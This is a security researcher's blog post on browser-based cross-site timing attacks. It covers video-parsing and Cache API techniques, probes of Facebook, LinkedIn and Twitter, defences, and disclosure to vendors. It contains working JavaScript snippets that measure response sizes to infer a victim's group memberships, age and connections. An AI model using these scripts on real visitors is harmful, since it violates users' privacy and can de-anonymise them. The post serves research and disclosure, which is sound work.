Timing Attacks in the Modern Web: The Clock is Still Ticking

Before you explore all the details of these browser-based timing attacks, head over to my laboratories to play around with these attacks yourself!

Timing attacks have been known for a long time. Among the earliest, and possibly the most well-known, attacks that leverage timing as side-channel information are those reported by Paul Kocher in 1996 (to give you an idea, that’s around the same time cookies were first introduced to the web). In his paper, Kocher showed that by measuring the execution time of private-key operations, it becomes possible to factor RSA keys and break other cryptosystems such as Diffie-Hellman. After all these years, timing attacks are still highly relevant (you may have heard about the Lucky 13 attack).

In the context of the web, one of the earliest mentions of timing attacks was in 2007, by Bortz and Boneh. In their work, the researchers introduced two types of web-based timing attacks: direct timing attacks and cross-site timing attacks. The former describes the scenario where the adversary directly (hence the name) interacts with the web server. For instance, by measuring the time the server takes to process a POST request to the /login endpoint, the attacker can infer the existence of a username. Similarly, when passwords are checked character by character, the adversary can leverage the timing information to figure out at which position the password comparison failed, and use this information to reveal a victim’s password.
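To make this a bit more concrete, the sketch below shows what such a direct timing measurement could look like. The https://target.example/login URL and the form parameters are hypothetical placeholders, and in practice the attacker would repeat the measurement many times and compare medians rather than rely on a single sample.

// Minimal sketch of a direct timing attack (hypothetical endpoint and
// parameters); the attacker runs this directly against the server.
function timeLogin(username, callback) {
    var start = performance.now();
    fetch('https://target.example/login', {
        method: 'POST',
        headers: {'Content-Type': 'application/x-www-form-urlencoded'},
        body: 'username=' + encodeURIComponent(username) + '&password=x'
    }).then(function() {
        // For an existing username the server typically does more work
        // (e.g. hashing the supplied password), so the elapsed time is larger.
        callback(performance.now() - start);
    });
}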

Cross-site Timing Attacks

The remainder of this post will focus on the other type of timing attack, namely the cross-site timing attack. The main difference with direct timing attacks is that in this scenario, it is not the attacker who sends requests to the targeted website. Instead, the attacker uses JavaScript to trigger the victim’s browser into sending out carefully crafted requests. As part of the timing attack, the adversary measures the time it takes for the client to download the associated resource. It is important to note here that the requests sent out by the victim are authenticated, i.e. they contain the Cookie header. This means that the response returned to the victim will be based on the state of that victim with the targeted website.

Here’s an example that should help you visualize this more easily. Let’s assume there is a popular social network https://social.com consisting of two groups: “The Force” and “The Dark Side”. The groups can be reached at the endpoints /the-force/ and /the-dark-side/, but the content posted in each group can only be accessed by its members; otherwise a short error message is returned. Now, when the victim visits some random website (e.g. this one), that website may contain malicious JavaScript written by the attacker (either served by the website itself, or included from a third-party source). The attacker will use this malicious JavaScript to figure out which group the victim belongs to, thereby violating their privacy. This JavaScript could be as simple as this:

// Measures how long it takes the victim's browser to fetch the resource at
// the given URL. The cross-origin response is not a valid image, so the
// 'error' event fires once the download (and failed decode) completes.
function getMeasurement(url, callback) {
    var i = new Image();
    i.addEventListener('error', function() {
        var end = performance.now();
        callback(end - start);
    });
    var start = performance.now();
    i.src = url;
}
// The larger (and thus slower) response indicates the group whose content
// the victim is allowed to see.
getMeasurement('https://social.com/the-force/', function(timeTF) {
    getMeasurement('https://social.com/the-dark-side/', function(timeTDS) {
        if (timeTF > timeTDS) {
            alert('The force is with you!');
        }
        else {
            alert('All hail the Dark Lord!');
        }
    });
});

In theory, this works like a charm. In practice, however, there are many factors that prevent this attack from working reliably. One of the main reasons is that networks (especially wireless ones) are not entirely stable, and since the request is made over the victim’s network, there is little the attacker can do to improve this. Networks suffer from congestion, jitter and brief interruptions, and any of these factors can ruin the attacker’s attempt to detect the victim’s group membership. To make matters worse (from the attacker’s point of view), most resources are served with gzip compression, making the difference in resource size (and thus in the timing measurement) even smaller. This is most likely why we haven’t seen any news headlines about attackers using cross-site timing attacks to steal private information.

Browser-based Timing Attacks

As part of the research I do at the University of Leuven, I set out to explore these cross-site timing attacks in more detail. This led to the discovery of a new class of timing attacks, namely “browser-based timing attacks”. Instead of relying on the unstable network download time, these attacks leverage side-channel leaks in browsers to measure the time the browser takes to process resources. More concretely, the timing measurement starts right after the resource has been downloaded (thereby avoiding jitter from the network), and stops after it has been processed.

I discovered four different browser functionalities that can be abused for the purpose of launching these attacks: <video> parsing, <script> parsing, disk storage (Cache API) and storage retrieval (ApplicationCache). In this post, I will only discuss the <video> parsing and disk storage attacks. If you’re interested in the details of the other attacks, have a look at our paper.

Video-parsing Attack

If you were expecting an elaborate attack with many complex formulae, I am sorry to disappoint you. In fact, it’s as simple as the one above:

function getMeasurement(url, callback) {
    var v = document.createElement('video');
    var start;
    v.addEventListener('suspend', function() {
        // 'suspend' fires when the browser stops downloading, i.e. when the
        // complete resource has been fetched.
        start = performance.now();
    });
    v.addEventListener('error', function() {
        // 'error' fires once the browser has tried (and failed) to parse the
        // resource as a video; the elapsed time depends on the resource size.
        var end = performance.now();
        callback(end - start);
    });
    v.src = url;
}

The main difference with the network-based cross-site timing attack is that the measurement now starts when the suspend event fires. According to the HTML5 standard, the suspend event is fired when the user agent is no longer downloading the resource. Because the targeted resource is not an actual video, and only a few tens or hundreds of kilobytes in size, the event will fire as soon as the resource has been downloaded. After this, the browser will try to parse the resource as a video. Of course, HTML/JSON/… files are not valid video formats, so the browser will trigger the error event on the <video> element. Interestingly, the time it takes for the browser to come to this decision is related to the size of the resource, which is exactly what the attacker is interested in.

Although this technique overcomes the influence of the network conditions, a single measurement for each endpoint might not be sufficient to make the attack reliable. Instead, the attacker should obtain multiple measurements and take the average or median. In most cases (except when the Cache-Control header contains the no-store directive), the attacker can simply leverage AppCache to force the browser to download and cache the resource. By doing so, only a single request is sent to the target website, and obtaining an additional measurement takes only 3-5ms.
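To give an idea of what such repeated measurements could look like, here is a small sketch that builds on the getMeasurement function above; the number of samples and the use of the median are my own choices for illustration, not something prescribed by the attack.

// Collects several measurements for the same URL and reports the median,
// which is more robust against outliers than a single sample or the average.
function getMedianMeasurement(url, samples, callback) {
    var timings = [];
    function next() {
        if (timings.length === samples) {
            timings.sort(function(a, b) { return a - b; });
            callback(timings[Math.floor(samples / 2)]);
            return;
        }
        getMeasurement(url, function(timing) {
            timings.push(timing);
            next();
        });
    }
    next();
}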

It should be noted that this attack does not work in Firefox because it strictly verifies the Content-Type of the response.

Cache Storage Attack

The Cache API, which aims to replace AppCache, provides developers with a fully programmable cache. More concretely, the Cache API can be used to store, retrieve and delete any type of response. Really, any type of response: cross-origin, authenticated, served with the no-store directive, you name it.

Writing a resource to the disk takes a certain amount of time, which is related to the size of that resource (writing 1 byte will obviously be much faster than writing 1GB). If we can measure the time the browser takes to do this, we can again get an estimate of the response size. I wouldn’t be writing this if it weren’t the case, so without further ado, this is what the cache storage timing attack looks like:

function getMeasurement(url, callback) {
    // Fetch the cross-origin resource with the victim's cookies attached.
    fetch(url, {mode: "no-cors", credentials: "include"}).then(function(resp) {
        // Naively wait a few seconds for the response body to be downloaded.
        setTimeout(function() {
            caches.open('attackz0r').then(function(cache) {
                // Time how long it takes to write the response to disk.
                var start = performance.now();
                cache.put(new Request('foo'), resp.clone()).then(function() {
                    var end = performance.now();
                    callback(end - start);
                });
            });
        }, 3000);
    });
}

If you are not familiar with the Fetch API or Promises, this may look a bit more complicated, but in fact it simply places a Response into the cache. What’s important to note is that I passed the following options to fetch(): {mode: "no-cors", credentials: "include"}. Basically, this makes sure that the fetch algorithm does not use the Cross-Origin Resource Sharing (CORS) mechanism, and includes the cookies with the request (which is important, because we want the response to be specific to the user). Also, because the Promise returned by fetch() resolves as soon as the response headers have been received (and not when the complete body has been downloaded), I used the very naive setTimeout method to wait for the response to finish downloading. This can easily be improved by first having a round of cache.put() and cache.delete(). Anyway, the take-away message is that we can measure the storage time, and use that to infer the length of the response.
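To sketch how that improvement could look (my own interpretation of the idea, not code from the paper): the first cache.put() only resolves once the full response body has been received and stored, so after deleting that entry, a second put() of the already-buffered body mostly measures the disk-write time.

// Sketch of the improved measurement: a warm-up round replaces the naive
// setTimeout. The entry name 'foo' and cache name 'attackz0r' match the
// example above.
function getMeasurement(url, callback) {
    fetch(url, {mode: "no-cors", credentials: "include"}).then(function(resp) {
        caches.open('attackz0r').then(function(cache) {
            // Warm-up round: storing a clone forces the complete body to be
            // downloaded (and buffers it for the original response object).
            cache.put(new Request('foo'), resp.clone()).then(function() {
                return cache.delete('foo');
            }).then(function() {
                // Timed round: the body is already available locally, so this
                // mainly measures how long it takes to write it to disk.
                var start = performance.now();
                cache.put(new Request('foo'), resp).then(function() {
                    callback(performance.now() - start);
                });
            });
        });
    });
}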

Performance

To evaluate the performance of these new browser-based timing attacks, we performed an experiment. We measured the time it takes an attacker to reliably, i.e. with 95% certainty, determine which of two resources is the larger one. We did this for pairs of files whose sizes differed by 5kB to 100kB, in 5kB increments. The experiments had the following results:

From the graph, it is immediately clear that the browser-based attacks outperform the classic attacks that rely on the network download time, especially when the difference in resource size is small. Also interesting to note is that the experiments were executed on our university’s (relatively stable) network. Nevertheless, for the case where the difference in resource size was 40kB, the classic method failed to point out the larger of the two resources.

Real-world Consequences

Now that we know there are techniques that can provide attackers with an estimate of the resource size, why should we care? Detecting group membership on social networks may not seem that impressive at first sight. However, if the attacker manages to find enough groups you belong to, he can intersect the member lists of all these groups and potentially uncover your identity (remember, the attacker is not supposed to know anything about your identity on other websites).

By looking at some popular websites, I discovered a number of other attack scenarios. I will give a brief overview of some of them; if you’re interested in the details, have a look at the paper. I have also set up an attack playground where you can try out some of these attacks yourself.

Facebook gives pages the ability to limit the audience that can see a certain post based on users’ demographics (age, gender, location, language). For instance, I can create a post that can only be viewed by users who are 27 years old. All other users receive an error message saying that the content is not accessible. These two responses differ in size, and can therefore be used to determine whether a user belongs to one group (users aged 27) or the other (users younger or older than 27). The same goes for all the other demographic features.
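As an illustration of how this could be probed (the post URLs below are hypothetical placeholders, and the attacker would first have to create one audience-restricted post per candidate age), one of the getMeasurement functions from above can simply be pointed at each post; the post the victim is allowed to see returns the full content instead of the short error page, and thus yields the largest timing.

// Hypothetical posts, each restricted by the attacker to a single age.
var probes = [
    {age: 26, url: 'https://www.facebook.com/attackerpage/posts/26'},
    {age: 27, url: 'https://www.facebook.com/attackerpage/posts/27'},
    {age: 28, url: 'https://www.facebook.com/attackerpage/posts/28'}
];

function findAge(index, best, callback) {
    if (index === probes.length) {
        callback(best.age);
        return;
    }
    getMeasurement(probes[index].url, function(timing) {
        // The accessible post produces the largest response, and thus timing.
        if (best === null || timing > best.timing) {
            best = {age: probes[index].age, timing: timing};
        }
        findAge(index + 1, best, callback);
    });
}

findAge(0, null, function(age) {
    console.log('Victim is most likely ' + age + ' years old');
});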

On LinkedIn, you can search through your contacts based on certain criteria. An attacker can send the same requests, picking the criteria he wants to know more about. By looking at the response sizes, the attacker can determine where the majority of your connections live, where they work, and what their job titles are.

Twitter users can “protect” their account, which makes their Tweets invisible to anyone who does not follow them. The response for such a profile will thus be larger for users who follow the protected account than for users who do not.

Defense Mechanisms

There are many opportunities to mitigate these attacks. Unfortunately, very few methods can be used to completely thwart them. In my opinion, one of the best candidates is to disable third-party cookies. Not only does this prevent all types of cross-site timing attacks, it also prevents attacks such as cross-site request forgery (CSRF) and cross-site script inclusion (XSSI). In fact, all cross-site attacks are prevented by blocking third-party cookies (note: XSS is not really a cross-site attack, it was just badly named). The reason this works is that if no cookies are attached to the requests triggered by the attacker, no user-specific content is returned, so there’s simply nothing for the attacker to steal. By default, all browsers allow third-party cookies, but most of them provide a setting that allows you to block them. I suggest you go ahead and do that right away; you will be surprised by how little impact it has on your typical browsing experience.

Disclosure

We reported these issues to various parties, both browser vendors and websites. Below are a few of their responses.

Chromium

Bug report

Response:

Thanks for reporting this. It seems like this is very similar to another report about cache-based side channel attacks from “The spy in the sandbox,” so I’m marking this as a duplicate. Please take a look at the other bug.

Note: These attacks have absolutely nothing in common with those from “The spy in the sandbox”.

Firefox

Bug report

Most relevant response:

This isn’t an issue Firefox can solve on its own; much of it is inherent in the design of the features. After the paper is published we can work with Chrome folks and other browser vendors to see if there are any reasonable ways to address this

Note: Since then (October 2015), nothing has changed.

Facebook

Response:

We ended up discussing this at length with the Facebook Security Team, and at the time we do not plan to make any changes to our site.

LinkedIn

Response:

  1. With regard to determining the general geographic region of a member, this is configurable by our members as to how much information they would like to share, in terms of the specificity of location, down to a city/zip code level. This information is not expected to be private, so we don’t consider that aspect a vulnerability.

  2. With regards to the connection status of two members, this is considered semi-private. There are limitations as to who can see this information, but it is never expected to be 100% private, as first degree members will always be able to see related connections. Do you have any proof of concept code, demonstrating the ability to exploit this in the described manner, that you’d be willing to share with us? If it is possible to exploit in the manner described, we would like to address this.

  3. The relationship of a member to a company is not considered private information on our site, so we don’t consider that aspect a vulnerability.

Note: From the response, it would seem that my report was misunderstood. It doesn’t matter that the leaked information is not considered private; what matters is that any website I visit can now learn all this information about me. Online advertising agencies are already building a very extensive profile of me, and I don’t want that profile to also include all the information I share on social networks. I want every site I visit to only know the things about me that I explicitly shared with it.

What’s next?

Unfortunately, these browser-based timing attacks are not the only method that can be used to obtain the response size. In a few days, Mathy and I will give a talk at Black Hat on how we can leverage TCP windows to determine the exact length of responses on the network level. The week after, we will present our research on techniques that can be used to expose the size of cross-origin resources at USENIX Security. Spoiler: we introduce two new techniques to get the exact size of cross-origin resources.